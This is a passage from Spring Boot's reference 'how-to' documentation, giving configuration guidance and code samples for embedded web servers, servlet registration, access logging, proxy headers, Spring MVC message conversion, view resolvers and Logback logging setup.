many common use cases, such as compression, SSL\nor HTTP\/2. However, if a configuration key doesn't exist for your use case, you should\nthen look at\n{dc-spring-boot}\/web\/server\/WebServerFactoryCustomizer.html[`WebServerFactoryCustomizer`].\nYou can declare such a component and get access to the server factory relevant to your\nchoice: you should select the variant for the chosen Server (Tomcat, Jetty, Reactor Netty,\nUndertow) and the chosen web stack (Servlet or Reactive).\n\nThe example below is for Tomcat with the `spring-boot-starter-web` (Servlet stack):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class MyTomcatWebServerCustomizer\n\t\t\timplements WebServerFactoryCustomizer<TomcatServletWebServerFactory> {\n\n\t\t@Override\n\t\tpublic void customize(TomcatServletWebServerFactory factory) {\n\t\t\t\/\/ customize the factory here\n\t\t}\n\t}\n----\n\nIn addition Spring Boot provides:\n\n[[howto-configure-webserver-customizers]]\n[cols=\"1,2,2\", options=\"header\"]\n|===\n| Server | Servlet stack | Reactive stack\n\n| Tomcat\n| `TomcatServletWebServerFactory`\n| `TomcatReactiveWebServerFactory`\n\n| Jetty\n| `JettyServletWebServerFactory`\n| `JettyReactiveWebServerFactory`\n\n| Undertow\n| `UndertowServletWebServerFactory`\n| `UndertowReactiveWebServerFactory`\n\n| Reactor\n| N\/A\n| `NettyReactiveWebServerFactory`\n\n|===\n\nOnce you've got access to a `WebServerFactory`, you can often add customizers to it to\nconfigure specific parts, like connectors, server resources, or the server itself - all\nusing server-specific APIs.\n\nAs a last resort, you can also declare your own `WebServerFactory` component, which will\noverride the one provided by Spring Boot. In this case, you can't rely on configuration\nproperties in the `server` namespace anymore.\n\n\n\n[[howto-add-a-servlet-filter-or-listener]]\n=== Add a Servlet, Filter, or Listener to an Application\nIn a servlet stack application, i.e. with the `spring-boot-starter-web`, there are two\nways to add `Servlet`, `Filter`, `ServletContextListener`, and the other listeners\nsupported by the Servlet API to your application:\n\n* <<howto-add-a-servlet-filter-or-listener-as-spring-bean>>\n* <<howto-add-a-servlet-filter-or-listener-using-scanning>>\n\n\n\n[[howto-add-a-servlet-filter-or-listener-as-spring-bean]]\n==== Add a Servlet, Filter, or Listener by Using a Spring Bean\nTo add a `Servlet`, `Filter`, or Servlet `*Listener` by using a Spring bean, you must\nprovide a `@Bean` definition for it. Doing so can be very useful when you want to inject\nconfiguration or dependencies. However, you must be very careful that they do not cause\neager initialization of too many other beans, because they have to be installed in the\ncontainer very early in the application lifecycle. (For example, it is not a good idea to\nhave them depend on your `DataSource` or JPA configuration.) You can work around such\nrestrictions by initializing the beans lazily when first used instead of on\ninitialization.\n\nIn the case of `Filters` and `Servlets`, you can also add mappings and init parameters by\nadding a `FilterRegistrationBean` or a `ServletRegistrationBean` instead of or in\naddition to the underlying component.\n\n[NOTE]\n====\nIf no `dispatcherType` is specified on a filter registration, `REQUEST` is used. This\naligns with the Servlet Specification's default dispatcher type.\n====\n\nLike any other Spring bean, you can define the order of Servlet filter beans; please\nmake sure to check the\n\"`<<spring-boot-features.adoc#boot-features-embedded-container-servlets-filters-listeners-beans>>`\"\nsection.\n\n\n\n[[howto-disable-registration-of-a-servlet-or-filter]]\n===== Disable Registration of a Servlet or Filter\nAs <<howto-add-a-servlet-filter-or-listener-as-spring-bean,described earlier>>, any\n`Servlet` or `Filter` beans are registered with the servlet container automatically. To\ndisable registration of a particular `Filter` or `Servlet` bean, create a registration\nbean for it and mark it as disabled, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean registration(MyFilter filter) {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean(filter);\n\t\tregistration.setEnabled(false);\n\t\treturn registration;\n\t}\n----\n\n\n\n[[howto-add-a-servlet-filter-or-listener-using-scanning]]\n==== Add Servlets, Filters, and Listeners by Using Classpath Scanning\n`@WebServlet`, `@WebFilter`, and `@WebListener` annotated classes can be automatically\nregistered with an embedded servlet container by annotating a `@Configuration` class\nwith `@ServletComponentScan` and specifying the package(s) containing the components\nthat you want to register. By default, `@ServletComponentScan` scans from the package\nof the annotated class.\n\n\n\n[[howto-configure-accesslogs]]\n=== Configure Access Logging\nAccess logs can be configured for Tomcat, Undertow, and Jetty through their respective\nnamespaces.\n\nFor instance, the following settings log access on Tomcat with a\n{tomcat-documentation}\/config\/valve.html#Access_Logging[custom pattern].\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.tomcat.basedir=my-tomcat\n\tserver.tomcat.accesslog.enabled=true\n\tserver.tomcat.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nNOTE: The default location for logs is a `logs` directory relative to the Tomcat base\ndirectory. By default, the `logs` directory is a temporary directory, so you may want to\nfix Tomcat's base directory or use an absolute path for the logs. In the preceding\nexample, the logs are available in `my-tomcat\/logs` relative to the working directory of\nthe application.\n\nAccess logging for Undertow can be configured in a similar fashion, as shown in the\nfollowing example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.undertow.accesslog.enabled=true\n\tserver.undertow.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nLogs are stored in a `logs` directory relative to the working directory of the\napplication. You can customize this location by setting the\n`server.undertow.accesslog.directory` property.\n\nFinally, access logging for Jetty can also be configured as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.jetty.accesslog.enabled=true\n\tserver.jetty.accesslog.filename=\/var\/log\/jetty-access.log\n----\n\nBy default, logs are redirected to `System.err`. For more details, see\n{jetty-documentation}\/configuring-jetty-request-logs.html[the Jetty documentation].\n\n\n\n[[howto-use-behind-a-proxy-server]]\n[[howto-use-tomcat-behind-a-proxy-server]]\n=== Running Behind a Front-end Proxy Server\nYour application might need to send `302` redirects or render content with absolute links\nback to itself. When running behind a proxy, the caller wants a link to the proxy and not\nto the physical address of the machine hosting your app. Typically, such situations are\nhandled through a contract with the proxy, which adds headers to tell the back end how to\nconstruct links to itself.\n\nIf the proxy adds conventional `X-Forwarded-For` and `X-Forwarded-Proto` headers (most\nproxy servers do so), the absolute links should be rendered correctly, provided\n`server.use-forward-headers` is set to `true` in your `application.properties`.\n\nNOTE: If your application runs in Cloud Foundry or Heroku, the\n`server.use-forward-headers` property defaults to `true`. In all\nother instances, it defaults to `false`.\n\n\n\n[[howto-customize-tomcat-behind-a-proxy-server]]\n==== Customize Tomcat's Proxy Configuration\nIf you use Tomcat, you can additionally configure the names of the headers used to\ncarry \"`forwarded`\" information, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-your-remote-ip-header\n\tserver.tomcat.protocol-header=x-your-protocol-header\n----\n\nTomcat is also configured with a default regular expression that matches internal\nproxies that are to be trusted. By default, IP addresses in `10\/8`, `192.168\/16`,\n`169.254\/16` and `127\/8` are trusted. You can customize the valve's configuration by\nadding an entry to `application.properties`, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.internal-proxies=192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\n----\n\nNOTE: The double backslashes are required only when you use a properties file for\nconfiguration. If you use YAML, single backslashes are sufficient, and a value\nequivalent to that shown in the preceding example would be `192\\.168\\.\\d{1,3}\\.\\d{1,3}`.\n\nNOTE: You can trust all proxies by setting the `internal-proxies` to empty (but do not do\nso in production).\n\nYou can take complete control of the configuration of Tomcat's `RemoteIpValve` by\nswitching the automatic one off (to do so, set `server.use-forward-headers=false`) and\nadding a new valve instance in a `TomcatServletWebServerFactory` bean.\n\n\n\n[[howto-enable-multiple-connectors-in-tomcat]]\n=== Enable Multiple Connectors with Tomcat\nYou can add an `org.apache.catalina.connector.Connector` to the\n`TomcatServletWebServerFactory`, which can allow multiple connectors, including HTTP and\nHTTPS connectors, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServletWebServerFactory servletContainer() {\n\t\tTomcatServletWebServerFactory tomcat = new TomcatServletWebServerFactory();\n\t\ttomcat.addAdditionalTomcatConnectors(createSslConnector());\n\t\treturn tomcat;\n\t}\n\n\tprivate Connector createSslConnector() {\n\t\tConnector connector = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\tHttp11NioProtocol protocol = (Http11NioProtocol) connector.getProtocolHandler();\n\t\ttry {\n\t\t\tFile keystore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tFile truststore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tconnector.setScheme(\"https\");\n\t\t\tconnector.setSecure(true);\n\t\t\tconnector.setPort(8443);\n\t\t\tprotocol.setSSLEnabled(true);\n\t\t\tprotocol.setKeystoreFile(keystore.getAbsolutePath());\n\t\t\tprotocol.setKeystorePass(\"changeit\");\n\t\t\tprotocol.setTruststoreFile(truststore.getAbsolutePath());\n\t\t\tprotocol.setTruststorePass(\"changeit\");\n\t\t\tprotocol.setKeyAlias(\"apitester\");\n\t\t\treturn connector;\n\t\t}\n\t\tcatch (IOException ex) {\n\t\t\tthrow new IllegalStateException(\"can't access keystore: [\" + \"keystore\"\n\t\t\t\t\t+ \"] or truststore: [\" + \"keystore\" + \"]\", ex);\n\t\t}\n\t}\n----\n\n\n\n[[howto-use-tomcat-legacycookieprocessor]]\n=== Use Tomcat's LegacyCookieProcessor\nBy default, the embedded Tomcat used by Spring Boot does not support \"Version 0\" of the\nCookie format, so you may see the following error:\n\n[indent=0]\n----\n\tjava.lang.IllegalArgumentException: An invalid character [32] was present in the Cookie value\n----\n\nIf at all possible, you should consider updating your code to only store values\ncompliant with later Cookie specifications. If, however, you cannot change the\nway that cookies are written, you can instead configure Tomcat to use a\n`LegacyCookieProcessor`. To switch to the `LegacyCookieProcessor`, use an\n`WebServerFactoryCustomizer` bean that adds a `TomcatContextCustomizer`, as shown\nin the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/embedded\/TomcatLegacyCookieProcessorExample.java[tag=customizer]\n----\n\n\n\n[[howto-enable-multiple-listeners-in-undertow]]\n=== Enable Multiple Listeners with Undertow\nAdd an `UndertowBuilderCustomizer` to the `UndertowServletWebServerFactory` and\nadd a listener to the `Builder`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic UndertowServletWebServerFactory servletWebServerFactory() {\n\t\tUndertowServletWebServerFactory factory = new UndertowServletWebServerFactory();\n\t\tfactory.addBuilderCustomizers(new UndertowBuilderCustomizer() {\n\n\t\t\t@Override\n\t\t\tpublic void customize(Builder builder) {\n\t\t\t\tbuilder.addHttpListener(8080, \"0.0.0.0\");\n\t\t\t}\n\n\t\t});\n\t\treturn factory;\n\t}\n----\n\n\n\n[[howto-create-websocket-endpoints-using-serverendpoint]]\n=== Create WebSocket Endpoints Using @ServerEndpoint\nIf you want to use `@ServerEndpoint` in a Spring Boot application that used an embedded\ncontainer, you must declare a single `ServerEndpointExporter` `@Bean`, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServerEndpointExporter serverEndpointExporter() {\n\t\treturn new ServerEndpointExporter();\n\t}\n----\n\nThe bean shown in the preceding example registers any `@ServerEndpoint` annotated beans\nwith the underlying WebSocket container. When deployed to a standalone servlet container,\nthis role is performed by a servlet container initializer, and the\n`ServerEndpointExporter` bean is not required.\n\n\n\n[[howto-spring-mvc]]\n== Spring MVC\n\nSpring Boot has a number of starters that include Spring MVC. Note that some starters\ninclude a dependency on Spring MVC rather than include it directly. This section answers\ncommon questions about Spring MVC and Spring Boot.\n\n[[howto-write-a-json-rest-service]]\n=== Write a JSON REST Service\nAny Spring `@RestController` in a Spring Boot application should render JSON response by\ndefault as long as Jackson2 is on the classpath, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RestController\n\tpublic class MyController {\n\n\t\t@RequestMapping(\"\/thing\")\n\t\tpublic MyThing thing() {\n\t\t\t\treturn new MyThing();\n\t\t}\n\n\t}\n----\n\nAs long as `MyThing` can be serialized by Jackson2 (true for a normal POJO or Groovy\nobject), then `http:\/\/localhost:8080\/thing` serves a JSON representation of it by\ndefault. Note that, in a browser, you might sometimes see XML responses, because browsers\ntend to send accept headers that prefer XML.\n\n\n\n[[howto-write-an-xml-rest-service]]\n=== Write an XML REST Service\nIf you have the Jackson XML extension (`jackson-dataformat-xml`) on the classpath, you\ncan use it to render XML responses. The previous example that we used for JSON would\nwork. To use the Jackson XML renderer, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>com.fasterxml.jackson.dataformat<\/groupId>\n\t\t<artifactId>jackson-dataformat-xml<\/artifactId>\n\t<\/dependency>\n----\n\nIf Jackson's XML extension is not available and JAXB is available, XML can be rendered\nwith the additional requirement of having `MyThing` annotated as `@XmlRootElement`, as\nshown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@XmlRootElement\n\tpublic class MyThing {\n\t\tprivate String name;\n\t\t\/\/ .. getters and setters\n\t}\n----\n\nJAXB is only available out of the box with Java 8. If you're using a more recent Java\ngeneration, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.glassfish.jaxb<\/groupId>\n\t\t<artifactId>jaxb-runtime<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: To get the server to render XML instead of JSON, you might have to send an\n`Accept: text\/xml` header (or use a browser).\n\n\n\n[[howto-customize-the-jackson-objectmapper]]\n=== Customize the Jackson ObjectMapper\nSpring MVC (client and server side) uses `HttpMessageConverters` to negotiate content\nconversion in an HTTP exchange. If Jackson is on the classpath, you already get the\ndefault converter(s) provided by `Jackson2ObjectMapperBuilder`, an instance of which\nis auto-configured for you.\n\nThe `ObjectMapper` (or `XmlMapper` for Jackson XML converter) instance (created by\ndefault) has the following customized properties:\n\n* `MapperFeature.DEFAULT_VIEW_INCLUSION` is disabled\n* `DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES` is disabled\n* `SerializationFeature.WRITE_DATES_AS_TIMESTAMPS` is disabled\n\nSpring Boot also has some features to make it easier to customize this behavior.\n\nYou can configure the `ObjectMapper` and `XmlMapper` instances by using the environment.\nJackson provides an extensive suite of simple on\/off features that can be used to\nconfigure various aspects of its processing. These features are described in six enums (in\nJackson) that map onto properties in the environment:\n\n|===\n|Enum|Property|Values\n\n|`com.fasterxml.jackson.databind.DeserializationFeature`\n|`spring.jackson.deserialization.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.core.JsonGenerator.Feature`\n|`spring.jackson.generator.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.databind.MapperFeature`\n|`spring.jackson.mapper.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.core.JsonParser.Feature`\n|`spring.jackson.parser.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.databind.SerializationFeature`\n|`spring.jackson.serialization.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.annotation.JsonInclude.Include`\n|`spring.jackson.default-property-inclusion`\n|`always`, `non_null`, `non_absent`, `non_default`, `non_empty`\n|===\n\nFor example, to enable pretty print, set `spring.jackson.serialization.indent_output=true`.\nNote that, thanks to the use of <<boot-features-external-config-relaxed-binding,\nrelaxed binding>>, the case of `indent_output` does not have to match the case of the\ncorresponding enum constant, which is `INDENT_OUTPUT`.\n\nThis environment-based configuration is applied to the auto-configured\n`Jackson2ObjectMapperBuilder` bean and applies to any mappers created by\nusing the builder, including the auto-configured `ObjectMapper` bean.\n\nThe context's `Jackson2ObjectMapperBuilder` can be customized by one or more\n`Jackson2ObjectMapperBuilderCustomizer` beans. Such customizer beans can be ordered\n(Boot's own customizer has an order of 0), letting additional customization be applied\nboth before and after Boot's customization.\n\nAny beans of type `com.fasterxml.jackson.databind.Module` are automatically registered\nwith the auto-configured `Jackson2ObjectMapperBuilder` and are applied to any `ObjectMapper`\ninstances that it creates. This provides a global mechanism for contributing custom\nmodules when you add new features to your application.\n\nIf you want to replace the default `ObjectMapper` completely, either define a `@Bean` of\nthat type and mark it as `@Primary` or, if you prefer the builder-based\napproach, define a `Jackson2ObjectMapperBuilder` `@Bean`. Note that, in either case,\ndoing so disables all auto-configuration of the `ObjectMapper`.\n\nIf you provide any `@Beans` of type `MappingJackson2HttpMessageConverter`,\nthey replace the default value in the MVC configuration. Also, a convenience bean of type\n`HttpMessageConverters` is provided (and is always available if you use the default MVC\nconfiguration). It has some useful methods to access the default and user-enhanced\nmessage converters.\n\nSee the \"`<<howto-customize-the-responsebody-rendering>>`\" section and the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-customize-the-responsebody-rendering]]\n=== Customize the @ResponseBody Rendering\nSpring uses `HttpMessageConverters` to render `@ResponseBody` (or responses from\n`@RestController`). You can contribute additional converters by adding beans of the\nappropriate type in a Spring Boot context. If a bean you add is of a type that would have\nbeen included by default anyway (such as `MappingJackson2HttpMessageConverter` for JSON\nconversions), it replaces the default value. A convenience bean of type\n`HttpMessageConverters` is provided and is always available if you use the default MVC\nconfiguration. It has some useful methods to access the default and user-enhanced message\nconverters (For example, it can be useful if you want to manually inject them into a\ncustom `RestTemplate`).\n\nAs in normal MVC usage, any `WebMvcConfigurer` beans that you provide can also\ncontribute converters by overriding the `configureMessageConverters` method. However, unlike\nwith normal MVC, you can supply only additional converters that you need (because Spring\nBoot uses the same mechanism to contribute its defaults). Finally, if you opt out of the\nSpring Boot default MVC configuration by providing your own `@EnableWebMvc` configuration,\nyou can take control completely and do everything manually by using\n`getMessageConverters` from `WebMvcConfigurationSupport`.\n\nSee the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-multipart-file-upload-configuration]]\n=== Handling Multipart File Uploads\nSpring Boot embraces the Servlet 3 `javax.servlet.http.Part` API to support uploading\nfiles. By default, Spring Boot configures Spring MVC with a maximum size of 1MB per\nfile and a maximum of 10MB of file data in a single request. You may override these\nvalues, the location to which intermediate data is stored (for example, to the `\/tmp`\ndirectory), and the threshold past which data is flushed to disk by using the properties\nexposed in the `MultipartProperties` class. For example, if you want to specify that\nfiles be unlimited, set the `spring.servlet.multipart.max-file-size` property to `-1`.\n\nThe multipart support is helpful when you want to receive multipart encoded file data as\na `@RequestParam`-annotated parameter of type `MultipartFile` in a Spring MVC controller\nhandler method.\n\nSee the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/MultipartAutoConfiguration.{sc-ext}[`MultipartAutoConfiguration`]\nsource for more details.\n\nNOTE: It is recommended to use the container's built-in support for multipart uploads\nrather than introducing an additional dependency such as Apache Commons File Upload.\n\n\n\n[[howto-switch-off-the-spring-mvc-dispatcherservlet]]\n=== Switch Off the Spring MVC DispatcherServlet\nBy default, all content is served from the root of your application (`\/`). If you\nwould rather map to a different path, you can configure one as follows:\n\n[source,properties,indent=0,subs=\"verbatim\"]\n----\n\tspring.mvc.servlet.path=\/acme\n----\n\nIf you have additional servlets you can declare a `@Bean` of type `Servlet` or\n`ServletRegistrationBean` for each and Spring Boot will register them transparently to the\ncontainer. Because servlets are registered that way, they can be mapped to a sub-context\nof the `DispatcherServlet` without invoking it.\n\nConfiguring the `DispatcherServlet` yourself is unusual but if you really need to do it, a\n`@Bean` of type `DispatcherServletPath` must be provided as well to provide the path of\nyour custom `DispatcherServlet`.\n\n\n\n[[howto-switch-off-default-mvc-configuration]]\n=== Switch off the Default MVC Configuration\nThe easiest way to take complete control over MVC configuration is to provide your own\n`@Configuration` with the `@EnableWebMvc` annotation. Doing so leaves all MVC\nconfiguration in your hands.\n\n\n\n[[howto-customize-view-resolvers]]\n=== Customize ViewResolvers\nA `ViewResolver` is a core component of Spring MVC, translating view names in\n`@Controller` to actual `View` implementations. Note that `ViewResolvers` are mainly\nused in UI applications, rather than REST-style services (a `View` is not used to render\na `@ResponseBody`). There are many implementations of `ViewResolver` to choose from, and\nSpring on its own is not opinionated about which ones you should use. Spring Boot, on the\nother hand, installs one or two for you, depending on what it finds on the classpath and\nin the application context. The `DispatcherServlet` uses all the resolvers it finds in\nthe application context, trying each one in turn until it gets a result, so, if you\nadd your own, you have to be aware of the order and in which position your resolver is\nadded.\n\n`WebMvcAutoConfiguration` adds the following `ViewResolvers` to your context:\n\n* An `InternalResourceViewResolver` named '`defaultViewResolver`'. This one locates\nphysical resources that can be rendered by using the `DefaultServlet` (including static\nresources and JSP pages, if you use those). It applies a prefix and a suffix to the\nview name and then looks for a physical resource with that path in the servlet context\n(the defaults are both empty but are accessible for external configuration through\n`spring.mvc.view.prefix` and `spring.mvc.view.suffix`). You can override it by\nproviding a bean of the same type.\n* A `BeanNameViewResolver` named '`beanNameViewResolver`'. This is a useful member of the\nview resolver chain and picks up any beans with the same name as the `View` being\nresolved. It should not be necessary to override or replace it.\n* A `ContentNegotiatingViewResolver` named '`viewResolver`' is added only if there *are*\nactually beans of type `View` present. This is a '`master`' resolver, delegating to all\nthe others and attempting to find a match to the '`Accept`' HTTP header sent by the\nclient. There is a useful\nhttps:\/\/spring.io\/blog\/2013\/06\/03\/content-negotiation-using-views[blog about\n`ContentNegotiatingViewResolver`] that you might like to study to learn more, and you\nmight also look at the source code for detail. You can switch off the auto-configured\n`ContentNegotiatingViewResolver` by defining a bean named '`viewResolver`'.\n* If you use Thymeleaf, you also have a `ThymeleafViewResolver` named\n'`thymeleafViewResolver`'. It looks for resources by surrounding the view name with a\nprefix and suffix. The prefix is `spring.thymeleaf.prefix`, and the suffix is\n`spring.thymeleaf.suffix`. The values of the prefix and suffix default to\n'`classpath:\/templates\/`' and '`.html`', respectively. You can override\n`ThymeleafViewResolver` by providing a bean of the same name.\n* If you use FreeMarker, you also have a `FreeMarkerViewResolver` named\n'`freeMarkerViewResolver`'. It looks for resources in a loader path (which is\nexternalized to `spring.freemarker.templateLoaderPath` and has a default value of\n'`classpath:\/templates\/`') by surrounding the view name with a prefix and a suffix. The\nprefix is externalized to `spring.freemarker.prefix`, and the suffix is externalized to\n`spring.freemarker.suffix`. The default values of the prefix and suffix are empty and\n'`.ftl`', respectively. You can override `FreeMarkerViewResolver` by providing a bean\nof the same name.\n* If you use Groovy templates (actually, if `groovy-templates` is on your classpath), you\nalso have a `GroovyMarkupViewResolver` named '`groovyMarkupViewResolver`'. It looks for\nresources in a loader path by surrounding the view name with a prefix and suffix\n(externalized to `spring.groovy.template.prefix` and `spring.groovy.template.suffix`).\nThe prefix and suffix have default values of '`classpath:\/templates\/`' and '`.tpl`',\nrespectively. You can override `GroovyMarkupViewResolver` by providing a bean of the\nsame name.\n\nFor more detail, see the following sections:\n\n* {sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\n* {sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]\n* {sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]\n* {sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\n\n\n\n[[howto-use-test-with-spring-security]]\n== Testing With Spring Security\nSpring Security provides support for running tests as a specific user.\nFor example, the test in the snippet below will run with an authenticated user\nthat has the `ADMIN` role.\n\n[source,java,indent=0]\n----\n\t@Test\n\t@WithMockUser(roles=\"ADMIN\")\n\tpublic void requestProtectedUrlWithUser() throws Exception {\n\t\tmvc\n\t\t\t.perform(get(\"\/\"))\n\t\t\t...\n\t}\n----\n\nSpring Security provides comprehensive integration with Spring MVC Test and\nthis can also be used when testing controllers using the `@WebMvcTest` slice and `MockMvc`.\n\nFor additional details on Spring Security's testing support, refer to Spring Security's\nhttps:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/reference\/htmlsingle\/#test[reference documentation]).\n\n\n\n[[howto-jersey]]\n== Jersey\n\n\n\n[[howto-jersey-spring-security]]\n=== Secure Jersey endpoints with Spring Security\nSpring Security can be used to secure a Jersey-based web application in much the same\nway as it can be used to secure a Spring MVC-based web application. However, if you want\nto use Spring Security's method-level security with Jersey, you must configure Jersey to\nuse `setStatus(int)` rather `sendError(int)`. This prevents Jersey from committing the\nresponse before Spring Security has had an opportunity to report an authentication or\nauthorization failure to the client.\n\nThe `jersey.config.server.response.setStatusOverSendError` property must be set to `true`\non the application's `ResourceConfig` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jersey\/JerseySetStatusOverSendErrorExample.java[tag=resource-config]\n----\n\n\n\n[[howto-http-clients]]\n== HTTP Clients\n\nSpring Boot offers a number of starters that work with HTTP clients. This section answers\nquestions related to using them.\n\n[[howto-http-clients-proxy-configuration]]\n=== Configure RestTemplate to Use a Proxy\nAs described in <<spring-boot-features.adoc#boot-features-resttemplate-customization>>,\nyou can use a `RestTemplateCustomizer` with `RestTemplateBuilder` to build a customized\n`RestTemplate`. This is the recommended approach for creating a `RestTemplate` configured\nto use a proxy.\n\nThe exact details of the proxy configuration depend on the underlying client request\nfactory that is being used. The following example configures\n`HttpComponentsClientRequestFactory` with an `HttpClient` that uses a proxy for all hosts\nexcept `192.168.0.5`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/client\/RestTemplateProxyCustomizationExample.java[tag=customizer]\n----\n\n\n\n[[howto-logging]]\n== Logging\n\nSpring Boot has no mandatory logging dependency, except for the Commons Logging API, which\nis typically provided by Spring Framework's `spring-jcl` module. To use\nhttps:\/\/logback.qos.ch[Logback], you need to include it and `spring-jcl` on the classpath.\nThe simplest way to do that is through the starters, which all depend on\n`spring-boot-starter-logging`. For a web application, you need only\n`spring-boot-starter-web`, since it depends transitively on the logging starter. If you\nuse Maven, the following dependency adds logging for you:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n----\n\nSpring Boot has a `LoggingSystem` abstraction that attempts to configure logging based on\nthe content of the classpath. If Logback is available, it is the first choice.\n\nIf the only change you need to make to logging is to set the levels of various loggers,\nyou can do so in `application.properties` by using the \"logging.level\" prefix, as shown\nin the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nYou can also set the location of a file to which to write the log (in addition to the\nconsole) by using \"logging.file\".\n\nTo configure the more fine-grained settings of a logging system, you need to use the native\nconfiguration format supported by the `LoggingSystem` in question. By default, Spring Boot\npicks up the native configuration from its default location for the system (such as\n`classpath:logback.xml` for Logback), but you can set the location of the config file by\nusing the \"logging.config\" property.\n\n\n\n[[howto-configure-logback-for-logging]]\n=== Configure Logback for Logging\nIf you put a `logback.xml` in the root of your classpath, it is picked up from there (or\nfrom `logback-spring.xml`, to take advantage of the templating features provided by\nBoot). Spring Boot provides a default base configuration that you can include if you\nwant to set levels, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/base.xml\"\/>\n\t\t<logger name=\"org.springframework.web\" level=\"DEBUG\"\/>\n\t<\/configuration>\n----\n\nIf you look at `base.xml` in the spring-boot jar, you can see that it uses\nsome useful System properties that the `LoggingSystem` takes care of creating for you:\n\n* `$\\{PID}`: The current process ID.\n* `$\\{LOG_FILE}`: Whether `logging.file` was set in Boot's external configuration.\n* `$\\{LOG_PATH}`: Whether `logging.path` (representing a directory for\n log files to live in) was set in Boot's external configuration.\n* `$\\{LOG_EXCEPTION_CONVERSION_WORD}`: Whether `logging.exception-conversion-word` was set\n in Boot's external configuration.\n\nSpring Boot also provides some nice ANSI color terminal output on a console (but not in\na log file) by using a custom Logback converter. See the default `base.xml` configuration\nfor details.\n\nIf Groovy is on the classpath, you should be able to configure Logback with\n`logback.groovy` as well. If present, this setting is given preference.\n\n\n\n[[howto-configure-logback-for-logging-fileonly]]\n==== Configure Logback for File-only Output\nIf you want to disable console logging and write output only to a file, you need a custom\n`logback-spring.xml` that imports `file-appender.xml` but not `console-appender.xml`, as\nshown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\" \/>\n\t\t<property name=\"LOG_FILE\" value=\"${LOG_FILE:-${LOG_PATH:-${LOG_TEMP:-${java.io.tmpdir:-\/tmp}}\/}spring.log}\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/file-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"FILE\" \/>\n\t\t<\/root>\n\t<\/configuration>\n----\n\nYou also need to add `logging.file` to your `application.properties`, as shown in the\nfollowing example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.file=myapplication.log\n----\n\n\n\n[[howto-configure-log4j-for-logging]]\n=== Configure Log4j for Logging\nSpring Boot supports 